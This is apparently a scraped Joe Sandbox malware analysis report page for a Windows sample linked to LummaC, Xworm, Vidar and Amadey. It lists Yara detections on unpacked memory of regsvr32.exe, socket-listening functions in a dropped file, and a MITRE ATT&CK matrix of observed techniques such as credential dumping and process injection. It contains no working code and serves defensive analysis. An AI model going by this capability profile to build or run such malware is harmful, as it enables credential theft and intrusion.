Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.ababde.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.2530000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.regsvr32.exe.256131e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4194977140.000000000288A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4194977140.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6264, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00492263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		20_2_00492263
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Code function: 20_2_00491C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		20_2_00491C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	111 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Windows Service	2 Valid Accounts	141 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	21 Access Token Manipulation	42 Software Packing	NTDS	269 System Information Discovery	Distributed Component Object Model	4 Clipboard Data	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	1 Windows Service	1 Timestomp	LSA Secrets	10101 Security Software Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	512 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	481 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	114 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	11 Scheduled Task/Job	121 Masquerading	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	3 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	481 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	512 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2E02vIiMfd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Xworm

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
2E02vIiMfd.exe